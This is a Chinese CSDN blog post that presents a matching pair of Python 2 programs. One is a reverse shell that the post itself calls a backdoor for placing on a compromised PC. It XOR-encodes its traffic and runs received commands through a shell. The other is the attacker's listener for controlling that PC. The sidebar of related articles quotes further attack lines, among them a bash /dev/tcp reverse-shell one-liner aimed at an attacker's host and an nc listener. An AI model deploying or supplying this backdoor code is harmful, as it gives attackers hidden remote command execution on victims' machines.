一对简单的 reverse shell / shell

最新推荐文章于 2024-08-07 12:18:26 发布
最新推荐文章于 2024-08-07 12:18:26 发布
阅读量3.8k 收藏 1
点赞数
分类专栏: Python 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cloudzk/article/details/50067659
版权 
一对入门级别的 reverse shell (反弹shell)和 shell (控制端)。
1、reverse shell (反弹端 client):
入侵者用于成功入侵后放置于受控PC上的反弹程序,相当于一个backdoor,reverse shell把受控PC的信息通过网络反弹至入侵者远程管理控制端。代码如下:

#!/usr/bin/python
import socket, subprocess, sys
RHOST = sys.argv[1]
RPORT = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))
while True:
    # receive XOR encoded data from network socket
    data = s.recv(1024)
    # XOR the data again with a '\x41' to get back to normal data
    en_data = bytearray(data)
    for i in range(len(en_data)):
        en_data[i] ^= 0x41
    # Execute the decode data as a command.
    # The subprocess module is great because we can PIPE STDOUT/STDERR/STDIN to a variable
    comm = subprocess.Popen(str(en_data), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE, stdin = subprocess.PIPE)
    comm.wait()
    STDOUT, STDERR = comm.communicate()   
    print STDERR
    # Encode the output and send to RHOST
    en_STDOUT= bytearray(STDOUT)
    for i in range(len(en_STDOUT)):
        en_STDOUT[i] ^= 0x41
    s.send(en_STDOUT)
s.close()

2、shell (远程管理控制端 server)
控制端用于远程操控受控PC,并接收reverse shell 反弹端远程回联信息。相当于木马的管理主控端 server 。shell 代码如下:

#!usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", 443))
s.listen(2048)
print "Listening on port 443... "
(client, (ip, port)) = s.accept()
print " recived connection from : ", ip
while True:
    command = raw_input('~$ ')
    encode = bytearray(command)
    for i in range(len(encode)):
        encode[i] ^= 0x41    
    client.send(encode)
    en_data = client.recv(2048) 
    decode = bytearray(en_data)
    for i in range(len(decode)):
        decode[i] ^= 0x41
    print decode
client.close()
s.close()

3、 实际运行效果如下:
管理控制端
反弹端

cloudzk
关注
专栏目录
反弹shell
ADDPPC的博客
11-26 591
反弹shellreverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、.
reverse-shell-generator:简单的脚本来生成反向shell
04-10
我用Python编写一个简单脚本可立即生成反向shell。 您不需要每次都打开Goog​​le,呵呵。 安装 1. Clone the Repository: git clone https://github.com/SoftwareUser23/reverse-shell-generator 2. Change the ...
linux反弹shell
qq_52072846的博客
11-26 1789
linux反弹shell 在攻击主机上执行端口监听 nc -lvvp port 在目标主机上执行: bash -i >& /dev/tcp/攻击主机ip/port 0>&1
Reverse Shell
最新发布
qq_67812668的博客
08-07 1094
Reverse shell是一种远程访问技术,其基本原理是让攻击者通过网络连接到受害者电脑的命令行界面或者终端进行操作,而不需要直接访问被攻击者的电脑。攻击者通过将特定的代码注入到受害者电脑中,以建立与其的通信通道,然后与受害者电脑的命令行界面或终端进行交互,达到对其进行控制的目的。Reverse shell通常被黑客用来远程控制被攻击的计算机,执行恶意代码、窃取敏感信息、修改、删除或传输文件、升级权限等行为。
Reverse Shell with Bash
cnbird's blog
02-27 869
http://www.google.cn/search?hl=zh-CN&source=hp&q=http%3A%2F%2Flabs.neohapsis.com%2F2008%2F04%2F17%2Fconnect-back-shell-literally%2F&btnG=Google+%E6%90%9C%E7%B4%A2&aq=f&oq=I am stuck at the Dubai Int
Reverse Shell 杂谈
有价值炮灰
12-06 1250
昨天有个小伙伴在群里问在 macOS 下如何实现 bash 反弹 shell,因为 Mac 中没有 `/dev/tcp` 目录。借着这个问题,就来简单谈谈反弹 shell 的那些事。
php-reverse-shell
07-24
在`php-reverse-shell-master`这个项目中,我们可以找到一个简单的PHP反向Shell示例。它通常包含一个PHP文件,比如`reverse_shell.php`,其中包含了上述提到的连接设置、套接字通信和命令执行等功能。攻击者只需要...
HTTP-Reverse-Shell:Python中的HTTP反向Shell
05-22
这是用Python编程的HTTP Reverse Shell。 它用于建立从客户端到服务器端的反向HTTP连接。 先决条件 Python 用法 在客户端上传输客户端程序 在服务器端传输服务器程序 运行服务器端程序以开始侦听 运行客户端程序 ...
icmpdoor:用Python 3和Scapy编写的ICMP Reverse Shell(backdoorrev shell
05-07
icmpdoor是用Python3和scapy编写的ICMP rev shell。 已在Ubuntu 20.04,Debian 10(Kali Linux)和Windows 10上进行测试。 Python版本用法(Windows和Linux): ./icmp-cnc.py -i INTERFACE -d VICTIM-IP (Command...
reverse-shell-generator:托管的具有大量功能的Reverse Shell生成器。 -(非常适合CTF)
03-03
托管反向Shell生成器,具有大量功能,非常适合CTF 特征 生成公共侦听器和反向外壳 自动复制到剪贴板 用于将侦听端口号增加1的按钮 URI和Base64编码 LocalStorage保留您的配置 暗光模式 截屏 托管实例
reverse-shell-generator:基于Web的反向shell生成器
02-05
reverse-shell-generator:基于Web的反向shell生成器
linux-ReverseShellasaService反弹shell即服务
08-13
Reverse Shell as a Service 反弹shell即服务
简单使用reverse
Nemoforest的博客
07-04 181
头文件#include <algorithm> 取反string string = s; cin >> s; reverse(s.begin(), s.end()); cout << s; 取反字符数组 char l[int] = "..." reverse(l, l+strlen(l)); cout << l; [参考]https://blog.csdn.net/qq_39093164/article/details/90107832 ...
反弹Shell
永远相信美好的事情即将发生
11-19 198
反弹shellreverse shell)就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。对于以上几种情况,我们是无法利用正向连接的,要用反向连接。所谓正向连接,就是攻击机去连目标机。那么反向连接就很好理解了,就是攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,即为反向连接。
Reverse-shell WP
qq_41252520的博客
08-09 314
前言 非常感谢子昂师傅分享的wp,从中学习到了一种逆向的思路。 关于此题,我主要打算讲三点: 1.脱壳 2.关键函数该怎么找 3.golang编写程序的一些特点 分析 【查壳】 64位程序加了UPX壳,我是头一次遇见的,没什么好的工具管用,只能x64gdb手脱。 可是这个程序有些奇怪,一开始断下来的位置并不属于用户态 这点与32位程序加了UPX后的不同。尝试使用ESP定律脱壳,在x64db...
Python 渗透测试:反弹 shell (反弹 后门 || 程序免杀)
网络安全领域___专研者.
05-15 2294
反弹 shell (Reverse Shell) 是一种常见的渗透测试技术,它指的是受害者主机主动连接攻击者的主机,从而让攻击者获得对受害者主机的控制权。在一个典型的反弹 shell 攻击中,攻击者会在自己的主机上监听一个特定的端口,然后诱使目标主机主动连接到这个端口。当目标主机与攻击者的主机建立连接后,攻击者就可以通过这个连接获得目标主机的 shell 访问权限,从而进行进一步的渗透和控制。
reverse shell思路
b10d9的博客
12-03 503
今天在做靶机练习的时候,遇到了在回连shell的时候,使用常用的reverse shell连接失败了。整理了以下思路。通过以下思路判断为何失效,并更新reverse shell内容。(不一定全,欢迎补充) 1. 利用phpinfo()来获取PHP的配置信息。 PHP:<?php phpinfo(); ?> 查看是否具备包含远程文件的条件:allow_url_fopen/allow_url_include是否开启。 查看是否有禁用的函数:disable_functions,重要
windows/x64/shell/reverse_tcp 无法连接
05-22
set PAYLOAD windows/x64/shell/reverse_tcp set LHOST set LPORT run ``` 如果成功建立 Session,说明 Payload 的生成和传输没有问题,但是可能是目标主机的防病毒软件或系统安全配置拦截了反向连接,需要进一步...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值